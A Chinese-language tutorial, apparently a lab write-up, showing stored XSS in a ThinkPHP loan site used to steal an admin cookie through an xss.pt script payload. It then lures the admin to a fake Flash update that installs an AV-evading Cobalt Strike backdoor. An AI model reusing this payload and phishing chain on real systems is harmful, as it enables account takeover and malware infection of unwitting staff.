簡介
請注意:
本文僅用於技術討論與研究,對於所有筆記中復現的這些終端或者伺服器,都是自行搭建的環境進行滲透的。我將使用Kali Linux作為此次學習的攻擊者機器。這裡使用的技術僅用於學習教育目的,如果列出的技術用於其他任何目標,本站及作者概不負責。
名言:
你對這行的興趣,決定你在這行的成就!
2021最新整理網路安全滲透測試/安全學習(全套視頻、大廠面經、精品手冊、必備工具包)一>關注我,私信回復「資料」獲取<一
一、前言
網路釣魚是社會工程學攻擊方式之一,主要是通過對受害者心理弱點、本能反應、好奇心、信任、貪婪等心理陷阱進行諸如欺騙、傷害等危害手段!
網路釣魚攻擊是個人和公司在保護其信息安全方面面臨的最常見的安全挑戰之一。無論是獲取密碼等,還是其他敏感信息,黑客都在使用電子郵件、社交媒體、電話和任何可能的通信方式竊取有價值的數據。
網路釣魚攻擊的興起對所有組織都構成了重大威脅。重要的是,如果他們要保護自己的信息,所有組織都應該知道如何發現一些最常見的網路釣魚騙局。同樣還要熟悉攻擊者用來實施這些騙局的一些最常見的技術類型。
這篇主要演示如何利用XSS植入釣魚,獲得管理員內部電腦許可權!
二、環境介紹

黑客(攻擊者):
IP:192.168.1.9
系統:kali.2020.4
kali上作為cs的服務端!
VPS伺服器:
thinkphp平台地址:
http://test1.dayuixiyou.cn/
釣魚地址:
http://flash.dayuixiyou.cn
辦公電腦:
系統:windwos7
雙網卡:
192.168.175.153
10.10.1.5
目前kali上運行了Cobalt strike ,攻擊者在自己的公網VPS伺服器上製作了後門頁面釣魚,通過滲透發現thinkphp貸款平台頁面存在XSS漏洞利用,通過插入XSS-js代碼,植入鏈接,最終黑客控制管理員辦公電腦的過程!!
三、XSS演示
此次演示貸款thinkphp平台在公網伺服器上!
1、註冊賬號密碼

進入個人中心!

註冊用戶名密碼!

登錄用戶名密碼後,普通用戶界面!點擊設置!

輸入結算信息,測試下!
2、存在XSS漏洞

輸入:
測試結果修改成功!查看下前端…

查看源代碼-編輯後查看到沒變動,XSS代碼還是存在…說明存在XSS攻擊
3、註冊XSS平台


創建一個新的項目,隨意填寫!

選擇Keepsession保持會話!
下一步!

會彈出需要執行的XSS利用代碼…選擇標準代碼測試!
</tExtArEa>'”><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>
4、利用XSS漏洞

</tExtArEa>'”><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>
這一段就是payload!將XSS連接信息返回到https://xss.pt平台上!

提交信息後,可看到網路net中XSS執行成功了…

執行成功,那麼XSS平台就收到了信息,可看到!
5、獲取管理員cookie

點擊提現…

申請結算,成功後,會將XSS執行代碼轉發到後台結算該模塊中!

當後台管理員訪問管理界面,給客戶結算資金的時候,點擊提現申請模塊!就會執行XSS植入的代碼!!

這時候,就返回了管理員的cookie和URL信息!
6、cookie登錄後台

目錄掃描獲得管理後台登錄頁面,通過Burp suite轉包攔截後!

將XSS平台獲取XSS漏洞植入代碼返回的包中,修改其中的url和cookie信息!

send執行後,通過cookie進入到了管理員後台!


複製URL!

瀏覽器中訪問後,正常進入管理員後台!
四、利用XSS釣魚
1、搭建Flash釣魚頁面

在公網伺服器搭建釣魚頁面,任何能訪問互聯網客戶都可以訪問該頁面!
2、生成免殺後門

利用Cobal Strike生成C#語言的shell…

利用該shell進行混淆,並利用python的tinyaes模塊混淆也行,在來個分離免殺,最後利用pyinstaller生成exe外殼…必過全國殺毒軟體!(不演示過程)
將flash修改名字為:
flashplayer_install_cn.exe(或者修改為update等吸引人下載的名稱都行)
3、修改Flash源碼

這是Flash貸款平台源碼文件目錄!!

修改index.html代碼,找到其中href=”進行修改為:
flashplayer_install_cn.exe
意思就是點擊頁面立即下載就能自動下載目錄下的exe後門文件!

在準備個js文件,意思是執行該js後,會在頁面提示:
您的 FLASH 版本過低,嘗試升級後訪問該頁面!
並訪問到該頁面:
http://flash.dayuixiyou.cn/

將exe和js都上傳到功能網伺服器apache底層!
測試訪問可看到正常讀取,確保內網管理員能執行XSS後訪問到js文件,這裡就可以開始了!
4、利用XSS漏洞植入JS

可看到利用(三)中XSS利用的方法,執行插入:
「><」
#需要前後加入閉合 「> <」

當”立即提交” 後直接執行了XSS植入的js文件,並提示了js中的內容!!
然後點確定後,直接跳轉到flash頁面!

和(三)中的方法一樣,需要在後台管理頁面也執行XSS,需要結算金額,讓管理員去結算的時候點擊執行XSS!
5、執行XSS下載flash

可看到內網管理員上班期間,登錄到管理後台,登錄管理員用戶後,工作職責需要給客戶結算金額,點擊了提現申請,一般客戶安全意識極差!!

點擊完成後,出現了您的 FLASH 版本過低,嘗試升級後訪問該頁面!,一般情況下都會點擊確認!

確認後跳轉到flash頁面,逼真的頁面!!點擊立即下載!!
這裡有個20.1MB的大小信息,這裡簡單在html修改下數字和EXE內容大小即可!

可看到下載了該後門,這裡圖標我沒修改,google或者百度利用Folder Changer修改成flash安裝包的圖標更逼真!!
這裡的exe是全免殺的,殺毒軟體都無法放行!!
6、成功XSS釣魚

執行安裝!


成功在kali攻擊機上的CS上線,可看到獲取到了管理員電腦的許可權!!
網路安全滲透測試資料一>關注我,私信回復「資料」領取<一
五、總結
這裡通過滲透中,找到了某平台的XSS漏洞,利用XSS漏洞植入代碼執行,誘騙到了對方客服或者管理員的內網電腦許可權!
其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免殺、CS4等等知識才可搭建!
那麼很多人都說flash都是經典的釣魚漏洞了,全國警惕性都會高很多,那麼我還是老話,提供的是思路,如果是一個破解軟體,一個購買網站,一個利用虛榮心或者是貪小便宜的購物頁面,等等進行釣魚,進行各類的植入的話,那有多少人會中招?
希望大家提高安全意識,沒有網路安全就沒有國家安全!
雖然基礎,但是必須牢記於心。
原創文章,作者:投稿專員,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/229993.html